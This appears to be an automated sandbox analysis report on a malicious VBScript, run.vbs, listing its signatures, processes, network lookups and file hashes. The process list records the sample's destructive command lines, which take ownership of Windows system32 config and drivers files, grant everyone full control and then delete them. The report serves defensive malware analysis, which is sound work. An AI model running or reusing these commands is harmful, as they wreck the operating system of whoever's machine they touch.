Malware Analysis Report

2024-11-16 12:52

Sample ID 240815-z6m9fszamp
Target run.vbs
SHA256 bc6bad8cc9c846a3496955805bcfab7d1df5e12a8c60fa266c526a3051c99745
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

bc6bad8cc9c846a3496955805bcfab7d1df5e12a8c60fa266c526a3051c99745

Threat Level: Likely malicious

The file run.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Checks computer location settings

Modifies file permissions

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:19

Reported

2024-08-15 21:22

Platform

win7-20240704-en

Max time kernel

120s

Max time network

124s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.wsf"

Signatures

N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.wsf"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:19

Reported

2024-08-15 21:21

Platform

win10v2004-20240802-en

Max time kernel

54s

Max time network

38s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.wsf"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\Notepad.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3324 wrote to memory of 4712 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3324 wrote to memory of 4712 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3324 wrote to memory of 1788 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3324 wrote to memory of 1788 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4712 wrote to memory of 3660 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 4712 wrote to memory of 3660 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1788 wrote to memory of 5004 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1788 wrote to memory of 5004 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 4712 wrote to memory of 2160 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 4712 wrote to memory of 2160 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1788 wrote to memory of 4892 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1788 wrote to memory of 4892 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.wsf"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\run.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Desktop\GetUninstall.vbs

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\RestartBackup.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\SaveUnpublish.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 25.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp

Files

C:\Users\Admin\Desktop\DebugStep.vbs

MD5 0fd6fb32bda4ebd6d5f4695335b1ad36
SHA1 5bf718741d02e633316ced147dbcf9d4d31e4200
SHA256 73a3849e7141aac5569d2493129b00f6b833c7c16d87470c0557386b20215c8c
SHA512 fde517c0ff84560900c86f37a4c33208862092902d83d2d6028b870bad6bb14fe139ea7fa2fa6e21da8cd29ed2bf2a5410eaf45e094882f72cdfde27d4a38696